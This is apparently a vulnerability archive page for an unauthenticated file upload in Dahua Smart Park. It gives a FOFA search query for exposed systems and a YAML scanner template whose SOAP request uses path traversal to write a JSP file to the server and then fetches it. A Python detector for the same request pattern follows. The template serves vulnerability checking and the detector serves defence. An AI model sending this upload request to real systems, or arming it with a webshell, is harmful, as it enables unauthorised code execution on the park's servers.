dahua-zhyq-pio-fileupload: Dahua Smart Park front-end poi file upload

Date: 2025-09-01 | Affected software: Dahua Smart Park | PoC: public

Vulnerability description

FOFA: app="dahua-智慧园区综合管理平台"

PoC code [public]

id: dahua-zhyq-pio-fileupload

info:
  name: 大华智慧园区 前台 poi 文件上传
  author: 5ddddd
  severity: critical
  description: |
    FOFA: app="dahua-智慧园区综合管理平台"
  verified: true
  tags: dahua,fileupload
  created: 2023/08/22

set:
  randstr: randomLowercase(20)
  r2: randomLowercase(32)
  randbody: base64(r2)
rules:
  r0:
    request:
      method: POST
      path: /emap/webservice/gis/soap/poi
      headers:
        Content-Type: text/xml;charset=UTF-8
      body: "\
        <soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:res=\"http://response.webservice.poi.mapbiz.emap.dahuatech.com/\">\r\n\
        <soapenv:Header/>\r\n\
        <soapenv:Body>\r\n\
        <res:uploadPicFile>\r\n\
        <!--type: string-->\r\n\
        <arg0>/../../{{randstr}}.jsp</arg0>\r\n\
        <!--type: base64Binary-->\r\n\
        <arg1>{{randbody}}</arg1>\r\n\
        </res:uploadPicFile>\r\n\
        </soapenv:Body>\r\n\
        </soapenv:Envelope>\r\n\
          "
    expression: response.status == 200  && response.body.bcontains(b'xmlns:')
  r1:
    request:
      method: GET
      path: /upload/{{randstr}}.jsp
      follow_redirects: true
    expression: response.status == 200 && response.body.bcontains(bytes(r2))
expression: r0() && r1()
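
Defender-side check for the two requests in the template above, as an added example that is not part of the published PoC or of any Dahua code: it inspects a request to the poi SOAP endpoint for an `uploadPicFile` call whose `arg0` leaves the upload directory or names a script file, and flags later fetches of scripts under `/upload/`. The function names, the `SCRIPT_EXTS` list and the sample bodies are assumptions constructed for illustration.

```python
import xml.etree.ElementTree as ET
from urllib.parse import unquote

POI_ENDPOINT = "/emap/webservice/gis/soap/poi"  # endpoint named in the template
UPLOAD_PREFIX = "/upload/"                      # path the template fetches afterwards
SCRIPT_EXTS = (".jsp", ".jspx")                 # assumption: types the server would execute


def inspect_poi_upload(method, path, body):
    """Return reasons why a request looks like an abusive uploadPicFile call."""
    route = unquote(path).split("?", 1)[0].rstrip("/")
    if method.upper() != "POST" or route != POI_ENDPOINT:
        return []
    if "<!DOCTYPE" in body.upper():
        # Never hand attacker-supplied DTDs to the parser inside a detector.
        return ["DOCTYPE in SOAP body, refused to parse"]
    try:
        root = ET.fromstring(body.strip())
    except ET.ParseError:
        return ["malformed XML sent to the poi endpoint"]
    reasons = []
    for elem in root.iter():
        # Match on the local name so any namespace prefix is accepted.
        if elem.tag.rsplit("}", 1)[-1] != "uploadPicFile":
            continue
        name = unquote((elem.findtext("arg0") or "").strip()).replace("\\", "/")
        if ".." in name.split("/"):
            reasons.append("arg0 has parent-directory segments: " + name)
        if name.lower().endswith(SCRIPT_EXTS):
            reasons.append("arg0 has a server-side script extension: " + name)
    return reasons


def is_uploaded_script_fetch(method, path):
    """Flag GET requests for script files under the upload directory."""
    route = unquote(path).split("?", 1)[0].lower()
    return method.upper() == "GET" and route.startswith(UPLOAD_PREFIX) and route.endswith(SCRIPT_EXTS)


def sample_body(filename):
    """Constructed SOAP body in the shape the template sends (harmless payload)."""
    return (
        '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" '
        'xmlns:res="http://response.webservice.poi.mapbiz.emap.dahuatech.com/">'
        "<soapenv:Header/><soapenv:Body><res:uploadPicFile>"
        f"<arg0>{filename}</arg0><arg1>Y29uc3RydWN0ZWQ=</arg1>"
        "</res:uploadPicFile></soapenv:Body></soapenv:Envelope>"
    )
```

A POST that yields findings followed by a flagged GET from the same client is the sequence the template's `r0() && r1()` expression tests for.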
